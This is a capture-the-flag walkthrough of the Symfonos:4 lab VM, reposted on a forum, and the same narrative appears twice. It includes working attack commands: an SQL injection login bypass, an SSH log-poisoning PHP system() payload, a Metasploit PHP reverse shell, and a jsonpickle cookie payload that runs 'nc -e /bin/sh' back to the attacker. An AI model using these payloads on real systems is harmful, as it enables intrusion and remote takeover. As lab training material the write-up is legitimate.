ChromaR
Testing Suite Builder
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Hello, guys today we are going to take a new challenge Symfonos:4, which is a fourth lab of the series Symfonos. The credit for making this VM machine goes to âZayoticâ and itâs another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.
Level: Intermediate
Penetrating Methodology:
Network Scanning
Enumeration
Exploitation
Privilege Escalation
Walkthrough
Network Scanning
We will be running this lab in a Virtual Machine Player or Virtual Box. But first, letâs discover the IP Address of the lab. i.e 192.168.0.23
Once the IP Address is acquired. Now we will run an aggressive scan using nmap for proceed further.
Enumeration
For more details, we will need to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service since port 80 is open.
Letâs further enumerate the target machine through a directory Bruteforce. For this, we are going to use the dirb tool. This gave us a page named âatlantis.phpâ and âsea.phpâ. After browsing both directories we noticed âsea.phpâ was redirecting to âatlantis.phpâ.
Exploitation
So, browsing Atlantis.php directory came out to be a Login Form. To further enumerate the form, we tried combinations of SQL Injection. After a few tries, we were able to bypass the Login form using âor â1â=â1â as a username. And for the password, we gave any random value.
We got a prompt to select a god after successfully bypassing the Login form. We selected any random god i.e Hades and were redirected to a URL which left us inquisitive.
After seeing all the possibilities, it quickly strikes letâs try Local File Inclusion. After trying to find /etc/passwd file but didnât succeed, after we thought of reading the log file using LFI. And we successfully did read the logs.
For Reference: https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/
So we try to inject malicious PHP command via SSH for poisoning auth logs as shown in the image below so that hopefully we can use a âCâ parameter to run arbitrary systems commands on the Target Machine.
Indeed we have to way to execute commands on the target machine. To confirm it we simply checked the id of the Target machine.
Time to Fire Up Metasploit, by using Web-Delivery module we have created a malicious link for PHP reverse shell.
We need to run the above PHP reverse shell in the âCâ parameter in the URL as shown in the image.
On successfully executing the Shell, We saw a new session is opened. To get the complete meterpreter we need to interact with the opened session. And to confirm we checked the system information.
We thought of checking the ongoing processes. After looking out, we saw an interesting process which was running on 127.0.0.1:8080 but we didnât see it in our Nmap result because it was an internal process.
Letâs forward the port 8080 to our port 8888.
Once done with port forwarding. We browsed the forwarded port 8888 with Localhost on the browser but where getting redirected to a page /whoami.
I guess we need to manually go back to the main page. Then we got a thought that we might have a cookie for the username.
Without wasting time lets intercept the request of this page using Burp Suite. So the cookie is base64 encoded. We need to decode it.
NOTE: Since port 8080 was busy with another process. So we change the listening of Burpsuite to any random port. Donât forget to configure it before intercepting the request.
We decoded the cookie using Burp Suite inbuilt decoder. After searching about the decoded string, we came to know it is a jsonpickle string.
Making some modification in the jsonpickle string, we added a netcat reverse shell and encoded the whole string into base64.
We need to replace the old cookie with the new base64 encoded string and forward the request in Burp Suite. Also, donât forget to spawn a netcat listener on port 5555 before forwarding the request on your Kali Terminal.
Privilege Escalation:
We successfully got the netcat session with root access. To confirm we have checked the Id of the user. The only thing left to do is we went inside the ROOT directory and Read our FLAG.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here
Level: Intermediate
Penetrating Methodology:
Network Scanning
- Netdiscover
- Nmap
Enumeration
- Browsing HTTP Service
- Directory Bruteforcing using dirb
Exploitation
- SQL injection to bypass Login Form
- Using LFI to read the Logs
- Using SSH log poisoning using PHP malicious script
- Using Metasploit to create PHP reverse shell
- Port Forwarding
- Encoding and Decoding Cookies
Privilege Escalation
- Inject netcat reverse shell into Json Pickle string
- Replacing cookie with Base64 Encoded Reverse Shell
- Getting Root Access
Walkthrough
Network Scanning
We will be running this lab in a Virtual Machine Player or Virtual Box. But first, letâs discover the IP Address of the lab. i.e 192.168.0.23
Code:
netdiscoverOnce the IP Address is acquired. Now we will run an aggressive scan using nmap for proceed further.
Code:
nmap -A 192.168.0.23Enumeration
For more details, we will need to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service since port 80 is open.
Letâs further enumerate the target machine through a directory Bruteforce. For this, we are going to use the dirb tool. This gave us a page named âatlantis.phpâ and âsea.phpâ. After browsing both directories we noticed âsea.phpâ was redirecting to âatlantis.phpâ.
Code:
dirb http://192.168.0.23/ /usr/share/wordlists/dirb/big.txt -X .phpExploitation
So, browsing Atlantis.php directory came out to be a Login Form. To further enumerate the form, we tried combinations of SQL Injection. After a few tries, we were able to bypass the Login form using âor â1â=â1â as a username. And for the password, we gave any random value.
We got a prompt to select a god after successfully bypassing the Login form. We selected any random god i.e Hades and were redirected to a URL which left us inquisitive.
After seeing all the possibilities, it quickly strikes letâs try Local File Inclusion. After trying to find /etc/passwd file but didnât succeed, after we thought of reading the log file using LFI. And we successfully did read the logs.
For Reference: https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/
So we try to inject malicious PHP command via SSH for poisoning auth logs as shown in the image below so that hopefully we can use a âCâ parameter to run arbitrary systems commands on the Target Machine.
Code:
ssh '<?php system($_GET['c']); ?>'@192.168.0.23Indeed we have to way to execute commands on the target machine. To confirm it we simply checked the id of the Target machine.
Time to Fire Up Metasploit, by using Web-Delivery module we have created a malicious link for PHP reverse shell.
Code:
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.025
exploitWe need to run the above PHP reverse shell in the âCâ parameter in the URL as shown in the image.
On successfully executing the Shell, We saw a new session is opened. To get the complete meterpreter we need to interact with the opened session. And to confirm we checked the system information.
Code:
sessions 1
sysinfoWe thought of checking the ongoing processes. After looking out, we saw an interesting process which was running on 127.0.0.1:8080 but we didnât see it in our Nmap result because it was an internal process.
Code:
psLetâs forward the port 8080 to our port 8888.
Code:
portfwd add -l 8888 -p 8080 -r 127.0.0.1Once done with port forwarding. We browsed the forwarded port 8888 with Localhost on the browser but where getting redirected to a page /whoami.
I guess we need to manually go back to the main page. Then we got a thought that we might have a cookie for the username.
Without wasting time lets intercept the request of this page using Burp Suite. So the cookie is base64 encoded. We need to decode it.
NOTE: Since port 8080 was busy with another process. So we change the listening of Burpsuite to any random port. Donât forget to configure it before intercepting the request.
We decoded the cookie using Burp Suite inbuilt decoder. After searching about the decoded string, we came to know it is a jsonpickle string.
Code:
{"py/object": "app.User", "username": "Poseidon"}Making some modification in the jsonpickle string, we added a netcat reverse shell and encoded the whole string into base64.
Code:
{"py/object":"__main__.Shell","py/reduce":[{"py/function":"os.system"},["/usr/bin/nc -e /bin/sh 192.168.0.25 5555"], 0, 0, 0]}We need to replace the old cookie with the new base64 encoded string and forward the request in Burp Suite. Also, donât forget to spawn a netcat listener on port 5555 before forwarding the request on your Kali Terminal.
Privilege Escalation:
We successfully got the netcat session with root access. To confirm we have checked the Id of the user. The only thing left to do is we went inside the ROOT directory and Read our FLAG.
Code:
nc -lvp 5555
id
cd/root
ls
cat proof.txtAuthor: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here